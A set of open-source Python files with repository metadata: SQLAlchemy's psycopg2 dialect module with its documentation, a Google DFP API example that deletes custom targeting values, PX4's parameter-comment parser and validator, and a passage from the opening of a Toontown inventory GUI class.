time are fetched over the wire to reduce conversational overhead.
Note that the ``stream_results=True`` execution option is a more targeted
way of enabling this mode on a per-execution basis.
* ``use_native_unicode``: Enable the usage of Psycopg2 "native unicode" mode
per connection. True by default.
* ``isolation_level``: This option, available for all PostgreSQL dialects,
includes the ``AUTOCOMMIT`` isolation level when using the psycopg2
dialect. See :ref:`psycopg2_isolation_level`.
Unix Domain Connections
------------------------
psycopg2 supports connecting via Unix domain connections. When the ``host``
portion of the URL is omitted, SQLAlchemy passes ``None`` to psycopg2,
which specifies Unix-domain communication rather than TCP/IP communication::
create_engine("postgresql+psycopg2://user:password@/dbname")
By default, the socket file used connects to a Unix-domain socket
in ``/tmp``, or whatever socket directory was specified when PostgreSQL
was built. This value can be overridden by passing a pathname to psycopg2,
using ``host`` as an additional keyword argument::
create_engine("postgresql+psycopg2://user:password@/dbname?host=/var/lib/postgresql")
See also:
`PQconnectdbParams <http://www.postgresql.org/docs/9.1/static/libpq-connect.html#LIBPQ-PQCONNECTDBPARAMS>`_
Per-Statement/Connection Execution Options
-------------------------------------------
The following DBAPI-specific options are respected when used with
:meth:`.Connection.execution_options`, :meth:`.Executable.execution_options`,
:meth:`.Query.execution_options`, in addition to those not specific to DBAPIs:
* isolation_level - Set the transaction isolation level for the lifespan of a
:class:`.Connection` (can only be set on a connection, not a statement
or query). See :ref:`psycopg2_isolation_level`.
* stream_results - Enable or disable usage of psycopg2 server side cursors -
this feature makes use of "named" cursors in combination with special
result handling methods so that result rows are not fully buffered.
If ``None`` or not set, the ``server_side_cursors`` option of the
:class:`.Engine` is used.
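For example, a minimal sketch of enabling streaming on a single connection
(the connection URL and table name here are illustrative)::
    engine = create_engine("postgresql+psycopg2://scott:tiger@localhost/test")
    conn = engine.connect()
    result = conn.execution_options(stream_results=True).\
        execute("SELECT * FROM big_table")
    for row in result:
        print(row)
    conn.close()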
Unicode
-------
By default, the psycopg2 driver uses the ``psycopg2.extensions.UNICODE``
extension, such that the DBAPI receives and returns all strings as Python
Unicode objects directly - SQLAlchemy passes these values through without
change. Psycopg2 here will encode/decode string values based on the
current "client encoding" setting; by default this is the value in
the ``postgresql.conf`` file, which often defaults to ``SQL_ASCII``.
Typically, this can be changed to ``utf-8``, as a more useful default::
#client_encoding = sql_ascii # actually, defaults to database
# encoding
client_encoding = utf8
A second way to affect the client encoding is to set it within Psycopg2
locally. SQLAlchemy will call psycopg2's ``set_client_encoding()``
method (see: http://initd.org/psycopg/docs/connection.html#connection.set_client_encoding)
on all new connections based on the value passed to
:func:`.create_engine` using the ``client_encoding`` parameter::
engine = create_engine("postgresql://user:pass@host/dbname", client_encoding='utf8')
This overrides the encoding specified in the Postgresql client configuration.
.. versionadded:: 0.7.3
The psycopg2-specific ``client_encoding`` parameter to
:func:`.create_engine`.
SQLAlchemy can also be instructed to skip the usage of the psycopg2
``UNICODE`` extension and to instead utilize its own unicode encode/decode
services, which are normally reserved only for those DBAPIs that don't
fully support unicode directly. Passing ``use_native_unicode=False`` to
:func:`.create_engine` will disable usage of ``psycopg2.extensions.UNICODE``.
SQLAlchemy will instead encode data itself into Python bytestrings on the way
in and coerce from bytes on the way back,
using the value of the :func:`.create_engine` ``encoding`` parameter, which
defaults to ``utf-8``.
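A minimal sketch of disabling the extension (the connection URL is illustrative)::
    engine = create_engine(
        "postgresql+psycopg2://scott:tiger@localhost/test",
        use_native_unicode=False, encoding='utf-8')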
SQLAlchemy's own unicode encode/decode functionality is steadily becoming
obsolete as more DBAPIs support unicode fully along with the approach of
Python 3; in modern usage psycopg2 should be relied upon to handle unicode.
Transactions
------------
The psycopg2 dialect fully supports SAVEPOINT and two-phase commit operations.
.. _psycopg2_isolation_level:
Psycopg2 Transaction Isolation Level
-------------------------------------
As discussed in :ref:`postgresql_isolation_level`,
all Postgresql dialects support setting of transaction isolation level
both via the ``isolation_level`` parameter passed to :func:`.create_engine`,
as well as the ``isolation_level`` argument used by :meth:`.Connection.execution_options`.
When using the psycopg2 dialect, these options make use of
psycopg2's ``set_isolation_level()`` connection method, rather than
emitting a Postgresql directive; this is because psycopg2's API-level
setting is always emitted at the start of each transaction in any case.
The psycopg2 dialect supports these constants for isolation level:
* ``READ COMMITTED``
* ``READ UNCOMMITTED``
* ``REPEATABLE READ``
* ``SERIALIZABLE``
* ``AUTOCOMMIT``
.. versionadded:: 0.8.2 support for AUTOCOMMIT isolation level when using
psycopg2.
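A minimal sketch of both styles (the connection URL is illustrative)::
    engine = create_engine(
        "postgresql+psycopg2://scott:tiger@localhost/test",
        isolation_level="REPEATABLE READ")
    # or per-connection, e.g. to get autocommit behavior:
    autocommit_conn = engine.connect().execution_options(
        isolation_level="AUTOCOMMIT")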
.. seealso::
:ref:`postgresql_isolation_level`
:ref:`pg8000_isolation_level`
NOTICE logging
---------------
The psycopg2 dialect will log Postgresql NOTICE messages via the
``sqlalchemy.dialects.postgresql`` logger::
import logging
logging.getLogger('sqlalchemy.dialects.postgresql').setLevel(logging.INFO)
.. _psycopg2_hstore:
HSTORE type
------------
The ``psycopg2`` DBAPI includes an extension to natively handle marshalling of the
HSTORE type. The SQLAlchemy psycopg2 dialect will enable this extension
by default when it is detected that the target database has the HSTORE
type set up for use. In other words, when the dialect makes the first
connection, a sequence like the following is performed:
1. Request the available HSTORE oids using ``psycopg2.extras.HstoreAdapter.get_oids()``.
If this function returns a list of HSTORE identifiers, we then determine that
the ``HSTORE`` extension is present.
2. If the ``use_native_hstore`` flag is at its default of ``True``, and
we've detected that ``HSTORE`` oids are available, the
``psycopg2.extensions.register_hstore()`` extension is invoked for all
connections.
The ``register_hstore()`` extension has the effect of **all Python dictionaries
being accepted as parameters regardless of the type of target column in SQL**.
The dictionaries are converted by this extension into a textual HSTORE expression.
If this behavior is not desired, disable the
use of the hstore extension by setting ``use_native_hstore`` to ``False`` as follows::
engine = create_engine("postgresql+psycopg2://scott:tiger@localhost/test",
use_native_hstore=False)
The ``HSTORE`` type is **still supported** when the ``psycopg2.extensions.register_hstore()``
extension is not used. It merely means that the coercion between Python dictionaries and the HSTORE
string format, on both the parameter side and the result side, will take
place within SQLAlchemy's own marshalling logic, and not that of ``psycopg2`` which
may be more performant.
"""
from __future__ import absolute_import
import re
import logging
from ... import util, exc
import decimal
from ... import processors
from ...engine import result as _result
from ...sql import expression
from ... import types as sqltypes
from .base import PGDialect, PGCompiler, \
PGIdentifierPreparer, PGExecutionContext, \
ENUM, ARRAY, _DECIMAL_TYPES, _FLOAT_TYPES,\
_INT_TYPES
from .hstore import HSTORE
from .json import JSON
logger = logging.getLogger('sqlalchemy.dialects.postgresql')
class _PGNumeric(sqltypes.Numeric):
def bind_processor(self, dialect):
return None
def result_processor(self, dialect, coltype):
if self.asdecimal:
if coltype in _FLOAT_TYPES:
return processors.to_decimal_processor_factory(
decimal.Decimal,
self._effective_decimal_return_scale)
elif coltype in _DECIMAL_TYPES or coltype in _INT_TYPES:
# pg8000 returns Decimal natively for 1700
return None
else:
raise exc.InvalidRequestError(
"Unknown PG numeric type: %d" % coltype)
else:
if coltype in _FLOAT_TYPES:
# pg8000 returns float natively for 701
return None
elif coltype in _DECIMAL_TYPES or coltype in _INT_TYPES:
return processors.to_float
else:
raise exc.InvalidRequestError(
"Unknown PG numeric type: %d" % coltype)
class _PGEnum(ENUM):
def result_processor(self, dialect, coltype):
if util.py2k and self.convert_unicode is True:
# we can't easily use PG's extensions here because
# the OID is on the fly, and we need to give it a python
# function anyway - not really worth it.
self.convert_unicode = "force_nocheck"
return super(_PGEnum, self).result_processor(dialect, coltype)
class _PGHStore(HSTORE):
def bind_processor(self, dialect):
if dialect._has_native_hstore:
return None
else:
return super(_PGHStore, self).bind_processor(dialect)
def result_processor(self, dialect, coltype):
if dialect._has_native_hstore:
return None
else:
return super(_PGHStore, self).result_processor(dialect, coltype)
class _PGJSON(JSON):
def result_processor(self, dialect, coltype):
if dialect._has_native_json:
return None
else:
return super(_PGJSON, self).result_processor(dialect, coltype)
# When we're handed literal SQL, ensure it's a SELECT query. Since
# 8.3, combining cursors and "FOR UPDATE" has been fine.
SERVER_SIDE_CURSOR_RE = re.compile(
r'\s*SELECT',
re.I | re.UNICODE)
_server_side_id = util.counter()
class PGExecutionContext_psycopg2(PGExecutionContext):
def create_cursor(self):
# TODO: coverage for server side cursors + select.for_update()
if self.dialect.server_side_cursors:
is_server_side = \
self.execution_options.get('stream_results', True) and (
(self.compiled and isinstance(self.compiled.statement, expression.Selectable) \
or \
(
(not self.compiled or
isinstance(self.compiled.statement, expression.TextClause))
and self.statement and SERVER_SIDE_CURSOR_RE.match(self.statement))
)
)
else:
is_server_side = \
self.execution_options.get('stream_results', False)
self.__is_server_side = is_server_side
if is_server_side:
# use server-side cursors:
# http://lists.initd.org/pipermail/psycopg/2007-January/005251.html
ident = "c_%s_%s" % (hex(id(self))[2:], hex(_server_side_id())[2:])
return self._dbapi_connection.cursor(ident)
else:
return self._dbapi_connection.cursor()
def get_result_proxy(self):
# TODO: ouch
if logger.isEnabledFor(logging.INFO):
self._log_notices(self.cursor)
if self.__is_server_side:
return _result.BufferedRowResultProxy(self)
else:
return _result.ResultProxy(self)
def _log_notices(self, cursor):
for notice in cursor.connection.notices:
# NOTICE messages have a
# newline character at the end
logger.info(notice.rstrip())
cursor.connection.notices[:] = []
class PGCompiler_psycopg2(PGCompiler):
def visit_mod_binary(self, binary, operator, **kw):
return self.process(binary.left, **kw) + " %% " + \
self.process(binary.right, **kw)
def post_process_text(self, text):
return text.replace('%', '%%')
class PGIdentifierPreparer_psycopg2(PGIdentifierPreparer):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
return value.replace('%', '%%')
class PGDialect_psycopg2(PGDialect):
driver = 'psycopg2'
if util.py2k:
supports_unicode_statements = False
default_paramstyle = 'pyformat'
supports_sane_multi_rowcount = False # set to true based on psycopg2 version
execution_ctx_cls = PGExecutionContext_psycopg2
statement_compiler = PGCompiler_psycopg2
preparer = PGIdentifierPreparer_psycopg2
psycopg2_version = (0, 0)
_has_native_hstore = False
_has_native_json = False
colspecs = util.update_copy(
PGDialect.colspecs,
{
sqltypes.Numeric: _PGNumeric,
ENUM: _PGEnum, # needs force_unicode
sqltypes.Enum: _PGEnum, # needs force_unicode
HSTORE: _PGHStore,
JSON: _PGJSON
}
)
def __init__(self, server_side_cursors=False, use_native_unicode=True,
client_encoding=None,
use_native_hstore=True,
**kwargs):
PGDialect.__init__(self, **kwargs)
self.server_side_cursors = server_side_cursors
self.use_native_unicode = use_native_unicode
self.use_native_hstore = use_native_hstore
self.supports_unicode_binds = use_native_unicode
self.client_encoding = client_encoding
if self.dbapi and hasattr(self.dbapi, '__version__'):
m = re.match(r'(\d+)\.(\d+)(?:\.(\d+))?',
self.dbapi.__version__)
if m:
self.psycopg2_version = tuple(
int(x)
for x in m.group(1, 2, 3)
if x is not None)
def initialize(self, connection):
super(PGDialect_psycopg2, self).initialize(connection)
self._has_native_hstore = self.use_native_hstore and \
self._hstore_oids(connection.connection) \
is not None
self._has_native_json = self.psycopg2_version >= (2, 5)
# http://initd.org/psycopg/docs/news.html#what-s-new-in-psycopg-2-0-9
self.supports_sane_multi_rowcount = self.psycopg2_version >= (2, 0, 9)
@classmethod
def dbapi(cls):
import psycopg2
return psycopg2
@util.memoized_property
def _isolation_lookup(self):
from psycopg2 import extensions
return {
'AUTOCOMMIT': extensions.ISOLATION_LEVEL_AUTOCOMMIT,
'READ COMMITTED': extensions.ISOLATION_LEVEL_READ_COMMITTED,
'READ UNCOMMITTED': extensions.ISOLATION_LEVEL_READ_UNCOMMITTED,
'REPEATABLE READ': extensions.ISOLATION_LEVEL_REPEATABLE_READ,
'SERIALIZABLE': extensions.ISOLATION_LEVEL_SERIALIZABLE
}
def set_isolation_level(self, connection, level):
try:
level = self._isolation_lookup[level.replace('_', ' ')]
except KeyError:
raise exc.ArgumentError(
"Invalid value '%s' for isolation_level. "
"Valid isolation levels for %s are %s" %
(level, self.name, ", ".join(self._isolation_lookup))
)
connection.set_isolation_level(level)
def on_connect(self):
from psycopg2 import extras, extensions
fns = []
if self.client_encoding is not None:
def on_connect(conn):
conn.set_client_encoding(self.client_encoding)
fns.append(on_connect)
if self.isolation_level is not None:
def on_connect(conn):
self.set_isolation_level(conn, self.isolation_level)
fns.append(on_connect)
if self.dbapi and self.use_native_unicode:
def on_connect(conn):
extensions.register_type(extensions.UNICODE, conn)
extensions.register_type(extensions.UNICODEARRAY, conn)
fns.append(on_connect)
if self.dbapi and self.use_native_hstore:
def on_connect(conn):
hstore_oids = self._hstore_oids(conn)
if hstore_oids is not None:
oid, array_oid = hstore_oids
if util.py2k:
extras.register_hstore(conn, oid=oid,
array_oid=array_oid,
unicode=True)
else:
extras.register_hstore(conn, oid=oid,
array_oid=array_oid)
fns.append(on_connect)
if self.dbapi and self._json_deserializer:
def on_connect(conn):
extras.register_default_json(conn, loads=self._json_deserializer)
fns.append(on_connect)
if fns:
def on_connect(conn):
for fn in fns:
fn(conn)
return on_connect
else:
return None
@util.memoized_instancemethod
def _hstore_oids(self, conn):
if self.psycopg2_version >= (2, 4):
from psycopg2 import extras
oids = extras.HstoreAdapter.get_oids(conn)
if oids is not None and oids[0]:
return oids[0:2]
return None
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
if 'port' in opts:
opts['port'] = int(opts['port'])
opts.update(url.query)
return ([], opts)
def is_disconnect(self, e, connection, cursor):
if isinstance(e, self.dbapi.Error):
# check the "closed" flag. this might not be
# present on old psycopg2 versions
if getattr(connection, 'closed', False):
return True
# legacy checks based on strings. the "closed" check
# above most likely obviates the need for any of these.
str_e = str(e).partition("\n")[0]
for msg in [
# these error messages from libpq: interfaces/libpq/fe-misc.c
# and interfaces/libpq/fe-secure.c.
'terminating connection',
'closed the connection',
'connection not open',
'could not receive data from server',
'could not send data to server',
                # psycopg2 client errors, psycopg2/connection.h,
# psycopg2/cursor.h
'connection already closed',
'cursor already closed',
# not sure where this path is originally from, it may
# be obsolete. It really says "losed", not "closed".
'losed the connection unexpectedly',
# this can occur in newer SSL
'connection has been closed unexpectedly'
]:
idx = str_e.find(msg)
if idx >= 0 and '"' not in str_e[:idx]:
return True
return False
dialect = PGDialect_psycopg2
|
{
"content_hash": "d0db0d0bbbb9328033f58c182c995546",
"timestamp": "",
"source": "github",
"line_count": 523,
"max_line_length": 107,
"avg_line_length": 39.29445506692161,
"alnum_prop": 0.6351029147000146,
"repo_name": "michaelBenin/sqlalchemy",
"id": "25fafa59c63d9d5474d124f81208121430b18a81",
"size": "20792",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/sqlalchemy/dialects/postgresql/psycopg2.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
"""This example deletes custom targeting values for a given custom targeting
key. To determine which custom targeting keys and values exist, run
get_all_custom_targeting_keys_and_values.py."""
__author__ = 'api.shamjeff@gmail.com (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
custom_targeting_service = client.GetService(
'CustomTargetingService', 'https://www.google.com', 'v201203')
key_id = 'INSERT_CUSTOM_TARGETING_KEY_ID_HERE'
filter_values = [{
'key': 'keyId',
'value': {
'xsi_type': 'NumberValue',
'value': key_id
}
}]
filter_statement = {'query': 'WHERE customTargetingKeyId = :keyId',
'values': filter_values}
# Get custom targeting values.
response = custom_targeting_service.GetCustomTargetingValuesByStatement(
filter_statement)[0]
values = []
if 'results' in response:
values = response['results']
print 'Number of custom targeting values to be deleted: %s' % len(values)
if values:
value_ids = [value['id'] for value in values]
action = {'type': 'DeleteCustomTargetingValues'}
filter_statement = {'query': 'WHERE customTargetingKeyId = :keyId '
'AND id IN (%s)' % ', '.join(value_ids),
'values': filter_values}
  # Delete custom targeting values.
result = custom_targeting_service.PerformCustomTargetingValueAction(
action, filter_statement)[0]
# Display results.
if result and result['numChanges'] > 0:
print 'Number of custom targeting values deleted: %s' % result['numChanges']
else:
print 'No custom targeting values were deleted.'
|
{
"content_hash": "a9049da2ada0b7b3a96ef90e687fcf3b",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 80,
"avg_line_length": 33.94827586206897,
"alnum_prop": 0.6785170137125445,
"repo_name": "donspaulding/adspygoogle",
"id": "66da2e90fd4f7207dff557761aed13ad089497a4",
"size": "2587",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201203/delete_custom_targeting_values.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3734067"
},
{
"name": "Shell",
"bytes": "603"
}
],
"symlink_target": ""
}
|
import sys
import re
import math
global default_var
default_var = {}
class ParameterGroup(object):
"""
Single parameter group
"""
def __init__(self, name):
self.name = name
self.no_code_generation = False #for injected parameters
self.params = []
def AddParameter(self, param):
"""
Add parameter to the group
"""
self.params.append(param)
def GetName(self):
"""
Get parameter group name
"""
return self.name
def GetParams(self):
"""
Returns the parsed list of parameters. Every parameter is a Parameter
object. Note that returned object is not a copy. Modifications affect
state of the parser.
"""
return sorted(self.params, key=lambda param: param.name)
class Parameter(object):
"""
Single parameter
"""
# Define sorting order of the fields
priority = {
"board": 9,
"short_desc": 8,
"long_desc": 7,
"min": 5,
"max": 4,
"unit": 3,
"decimal": 2,
# all others == 0 (sorted alphabetically)
}
def __init__(self, name, type, default = ""):
self.fields = {}
self.values = {}
self.bitmask = {}
self.name = name
self.type = type
self.default = default
self.category = ""
self.volatile = False
self.boolean = False
def GetName(self):
return self.name
def GetType(self):
return self.type
def GetDefault(self):
return self.default
def GetCategory(self):
return self.category.title()
def GetVolatile(self):
return self.volatile
def GetBoolean(self):
return self.boolean
def SetField(self, code, value):
"""
Set named field value
"""
self.fields[code] = value
def SetEnumValue(self, code, value):
"""
Set named enum value
"""
self.values[code] = value
def SetBitmaskBit(self, index, bit):
"""
Set named enum value
"""
self.bitmask[index] = bit
def SetVolatile(self):
"""
Set volatile flag
"""
self.volatile = True
def SetBoolean(self):
"""
Set boolean flag
"""
self.boolean = True
def SetCategory(self, category):
"""
Set param category
"""
self.category = category
def GetFieldCodes(self):
"""
Return list of existing field codes in convenient order
"""
keys = self.fields.keys()
keys = sorted(keys)
keys = sorted(keys, key=lambda x: self.priority.get(x, 0), reverse=True)
return keys
def GetFieldValue(self, code):
"""
Return value of the given field code or None if not found.
"""
fv = self.fields.get(code)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv
def GetEnumCodes(self):
"""
Return list of existing value codes in convenient order
"""
return sorted(self.values.keys(), key=float)
def GetEnumValue(self, code):
"""
Return value of the given enum code or None if not found.
"""
fv = self.values.get(code)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv
def GetBitmaskList(self):
"""
Return list of existing bitmask codes in convenient order
"""
keys = self.bitmask.keys()
return sorted(keys, key=float)
def GetBitmaskBit(self, index):
"""
Return value of the given bitmask code or None if not found.
"""
fv = self.bitmask.get(index)
if not fv:
# required because python 3 sorted does not accept None
return ""
return fv.strip()
class SourceParser(object):
"""
Parses provided data and stores all found parameters internally.
"""
re_split_lines = re.compile(r'[\r\n]+')
re_comment_start = re.compile(r'^\/\*\*')
re_comment_content = re.compile(r'^\*\s*(.*)')
re_comment_tag = re.compile(r'@([a-zA-Z][a-zA-Z0-9_]*)\s*(.*)')
re_comment_end = re.compile(r'(.*?)\s*\*\/')
re_parameter_definition = re.compile(r'PARAM_DEFINE_([A-Z_][A-Z0-9_]*)\s*\(([A-Z_][A-Z0-9_]*)\s*,\s*([^ ,\)]+)\s*\)\s*;')
re_px4_parameter_definition = re.compile(r'PX4_PARAM_DEFINE_([A-Z_][A-Z0-9_]*)\s*\(([A-Z_][A-Z0-9_]*)\s*\)\s*;')
re_px4_param_default_definition = re.compile(r'#define\s*PARAM_([A-Z_][A-Z0-9_]*)\s*([^ ,\)]+)\s*')
re_cut_type_specifier = re.compile(r'[a-z]+$')
re_is_a_number = re.compile(r'^-?[0-9\.]')
re_remove_dots = re.compile(r'\.+$')
re_remove_carriage_return = re.compile('\n+')
valid_tags = set(["group", "board", "min", "max", "unit", "decimal", "increment", "reboot_required", "value", "boolean", "bit", "category", "volatile"])
# Order of parameter groups
priority = {
# All other groups = 0 (sort alphabetically)
"Miscellaneous": -10
}
def __init__(self):
self.param_groups = {}
def Parse(self, contents):
"""
Incrementally parse program contents and append all found parameters
to the list.
"""
# This code is essentially a comment-parsing grammar. "state"
# represents parser state. It contains human-readable state
# names.
state = None
for line in self.re_split_lines.split(contents):
line = line.strip()
# Ignore empty lines
if line == "":
continue
if self.re_comment_start.match(line):
state = "wait-short"
short_desc = None
long_desc = None
tags = {}
def_values = {}
def_bitmask = {}
elif state is not None and state != "comment-processed":
m = self.re_comment_end.search(line)
if m:
line = m.group(1)
last_comment_line = True
else:
last_comment_line = False
m = self.re_comment_content.match(line)
if m:
comment_content = m.group(1)
if comment_content == "":
# When short comment ends with empty comment line,
# start waiting for the next part - long comment.
if state == "wait-short-end":
state = "wait-long"
else:
m = self.re_comment_tag.match(comment_content)
if m:
tag, desc = m.group(1, 2)
if (tag == "value"):
# Take the meta info string and split the code and description
metainfo = desc.split(" ", 1)
def_values[metainfo[0]] = metainfo[1]
elif (tag == "bit"):
# Take the meta info string and split the code and description
metainfo = desc.split(" ", 1)
def_bitmask[metainfo[0]] = metainfo[1]
else:
tags[tag] = desc
current_tag = tag
state = "wait-tag-end"
elif state == "wait-short":
# Store first line of the short description
short_desc = comment_content
state = "wait-short-end"
elif state == "wait-short-end":
# Append comment line to the short description
short_desc += "\n" + comment_content
elif state == "wait-long":
# Store first line of the long description
long_desc = comment_content
state = "wait-long-end"
elif state == "wait-long-end":
# Append comment line to the long description
long_desc += "\n" + comment_content
elif state == "wait-tag-end":
# Append comment line to the tag text
tags[current_tag] += "\n" + comment_content
else:
raise AssertionError(
"Invalid parser state: %s" % state)
elif not last_comment_line:
# Invalid comment line (inside comment, but not starting with
                    # "*" or "*/"). Reset parsed content.
state = None
if last_comment_line:
state = "comment-processed"
else:
tp = None
name = None
defval = ""
# Non-empty line outside the comment
m = self.re_px4_param_default_definition.match(line)
# Default value handling
if m:
name_m, defval_m = m.group(1,2)
default_var[name_m] = defval_m
m = self.re_parameter_definition.match(line)
if m:
tp, name, defval = m.group(1, 2, 3)
else:
m = self.re_px4_parameter_definition.match(line)
if m:
tp, name = m.group(1, 2)
if (name+'_DEFAULT') in default_var:
defval = default_var[name+'_DEFAULT']
if tp is not None:
# Remove trailing type specifier from numbers: 0.1f => 0.1
if defval != "" and self.re_is_a_number.match(defval):
defval = self.re_cut_type_specifier.sub('', defval)
param = Parameter(name, tp, defval)
param.SetField("short_desc", name)
# If comment was found before the parameter declaration,
# inject its data into the newly created parameter.
group = "Miscellaneous"
if state == "comment-processed":
if short_desc is not None:
if '\n' in short_desc:
raise Exception('short description must be a single line (parameter: {:})'.format(name))
if len(short_desc) > 150:
raise Exception('short description too long (150 max, is {:}, parameter: {:})'.format(len(short_desc), name))
param.SetField("short_desc", self.re_remove_dots.sub('', short_desc))
if long_desc is not None:
long_desc = self.re_remove_carriage_return.sub(' ', long_desc)
param.SetField("long_desc", long_desc)
for tag in tags:
if tag == "group":
group = tags[tag]
elif tag == "volatile":
param.SetVolatile()
elif tag == "category":
param.SetCategory(tags[tag])
elif tag == "boolean":
param.SetBoolean()
elif tag not in self.valid_tags:
sys.stderr.write("Skipping invalid documentation tag: '%s'\n" % tag)
return False
else:
param.SetField(tag, tags[tag])
for def_value in def_values:
param.SetEnumValue(def_value, def_values[def_value])
for def_bit in def_bitmask:
param.SetBitmaskBit(def_bit, def_bitmask[def_bit])
# Store the parameter
if group not in self.param_groups:
self.param_groups[group] = ParameterGroup(group)
self.param_groups[group].AddParameter(param)
state = None
return True
def IsNumber(self, numberString):
try:
float(numberString)
return True
except ValueError:
return False
def Validate(self):
"""
Validates the parameter meta data.
"""
seenParamNames = []
#allowedUnits should match set defined in /Firmware/validation/module_schema.yaml
allowedUnits = set ([
'%', 'Hz', '1/s', 'mAh',
'rad', '%/rad', 'rad/s', 'rad/s^2', '%/rad/s', 'rad s^2/m', 'rad s/m',
'bit/s', 'B/s',
'deg', 'deg*1e7', 'deg/s',
'celcius', 'gauss', 'gauss/s', 'gauss^2',
'hPa', 'kg', 'kg/m^2', 'kg m^2',
'mm', 'm', 'm/s', 'm^2', 'm/s^2', 'm/s^3', 'm/s^2/sqrt(Hz)', 'm/s/rad',
'Ohm', 'V',
'us', 'ms', 's',
'S', 'A/%', '(m/s^2)^2', 'm/m', 'tan(rad)^2', '(m/s)^2', 'm/rad',
'm/s^3/sqrt(Hz)', 'm/s/sqrt(Hz)', 's/(1000*PWM)', '%m/s', 'min', 'us/C',
'N/(m/s)', 'Nm/rad', 'Nm/(rad/s)', 'Nm', 'N',
'normalized_thrust/s', 'normalized_thrust', 'norm', 'SD',''])
for group in self.GetParamGroups():
for param in group.GetParams():
name = param.GetName()
if len(name) > 16:
sys.stderr.write("Parameter Name {0} is too long (Limit is 16)\n".format(name))
return False
board = param.GetFieldValue("board")
# Check for duplicates
name_plus_board = name + "+" + board
for seenParamName in seenParamNames:
if seenParamName == name_plus_board:
sys.stderr.write("Duplicate parameter definition: {0}\n".format(name_plus_board))
return False
seenParamNames.append(name_plus_board)
# Validate values
default = param.GetDefault()
min = param.GetFieldValue("min")
max = param.GetFieldValue("max")
units = param.GetFieldValue("unit")
if units not in allowedUnits:
sys.stderr.write("Invalid unit in {0}: {1}\n".format(name, units))
return False
#sys.stderr.write("{0} default:{1} min:{2} max:{3}\n".format(name, default, min, max))
if default != "" and not self.IsNumber(default):
sys.stderr.write("Default value not number: {0} {1}\n".format(name, default))
return False
# if default != "" and "." not in default:
# sys.stderr.write("Default value does not contain dot (e.g. 10 needs to be written as 10.0): {0} {1}\n".format(name, default))
# return False
if min != "":
if not self.IsNumber(min):
sys.stderr.write("Min value not number: {0} {1}\n".format(name, min))
return False
if default != "" and float(default) < float(min):
sys.stderr.write("Default value is smaller than min: {0} default:{1} min:{2}\n".format(name, default, min))
return False
if max != "":
if not self.IsNumber(max):
sys.stderr.write("Max value not number: {0} {1}\n".format(name, max))
return False
if default != "" and float(default) > float(max):
sys.stderr.write("Default value is larger than max: {0} default:{1} max:{2}\n".format(name, default, max))
return False
for code in param.GetEnumCodes():
if not self.IsNumber(code):
sys.stderr.write("Min value not number: {0} {1}\n".format(name, code))
return False
if param.GetEnumValue(code) == "":
sys.stderr.write("Description for enum value is empty: {0} {1}\n".format(name, code))
return False
for index in param.GetBitmaskList():
if not self.IsNumber(index):
sys.stderr.write("bit value not number: {0} {1}\n".format(name, index))
return False
if not int(min) <= math.pow(2, int(index)) <= int(max):
sys.stderr.write("Bitmask bit must be between {0} and {1}: {2} {3}\n".format(min, max, name, math.pow(2, int(index))))
return False
if param.GetBitmaskBit(index) == "":
sys.stderr.write("Description for bitmask bit is empty: {0} {1}\n".format(name, index))
return False
return True
def GetParamGroups(self):
"""
Returns the parsed list of parameters. Every parameter is a Parameter
object. Note that returned object is not a copy. Modifications affect
state of the parser.
"""
groups = self.param_groups.values()
groups = sorted(groups, key=lambda x: x.GetName())
groups = sorted(groups, key=lambda x: self.priority.get(x.GetName(), 0), reverse=True)
return groups
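# Illustrative usage sketch (an assumption added for demonstration, not part of
# the original module): parse one source file given on the command line,
# validate it and print the discovered parameter groups.
if __name__ == '__main__':
    parser = SourceParser()
    with open(sys.argv[1]) as source_file:
        contents = source_file.read()
    if parser.Parse(contents) and parser.Validate():
        for group in parser.GetParamGroups():
            for param in group.GetParams():
                print("{0}/{1} (default: {2})".format(
                    group.GetName(), param.GetName(), param.GetDefault()))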
|
{
"content_hash": "13cada8703c6eafdad738308c7e86f40",
"timestamp": "",
"source": "github",
"line_count": 439,
"max_line_length": 156,
"avg_line_length": 41.65375854214123,
"alnum_prop": 0.46478180028437055,
"repo_name": "acfloria/Firmware",
"id": "7fadf9f7c3e233cc176567bca3d314f13be8a582",
"size": "18286",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/lib/parameters/px4params/srcparser.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "3738677"
},
{
"name": "C++",
"bytes": "9489997"
},
{
"name": "CMake",
"bytes": "1106585"
},
{
"name": "EmberScript",
"bytes": "93414"
},
{
"name": "GDB",
"bytes": "41"
},
{
"name": "Groovy",
"bytes": "66180"
},
{
"name": "HTML",
"bytes": "5343"
},
{
"name": "MATLAB",
"bytes": "9938"
},
{
"name": "Makefile",
"bytes": "20040"
},
{
"name": "Perl",
"bytes": "11401"
},
{
"name": "Python",
"bytes": "1300486"
},
{
"name": "Shell",
"bytes": "301338"
}
],
"symlink_target": ""
}
|
from direct.gui.DirectGui import *
from panda3d.core import *
from toontown.toonbase.ToontownBattleGlobals import *
import InventoryBase
from toontown.toonbase import TTLocalizer
from toontown.quest import BlinkingArrows
from direct.interval.IntervalGlobal import *
from direct.directnotify import DirectNotifyGlobal
from toontown.toonbase import ToontownGlobals
from otp.otpbase import OTPGlobals
from toontown.toontowngui import TTDialog
class InventoryNewNEW(InventoryBase.InventoryBase, DirectFrame):
notify = DirectNotifyGlobal.directNotify.newCategory('InventoryNew')
PressableTextColor = Vec4(1, 1, 1, 1)
PressableGeomColor = Vec4(1, 1, 1, 1)
PressableImageColor = Vec4(0, 0.6, 1, 1)
PropBonusPressableImageColor = Vec4(1.0, 0.6, 0.0, 1)
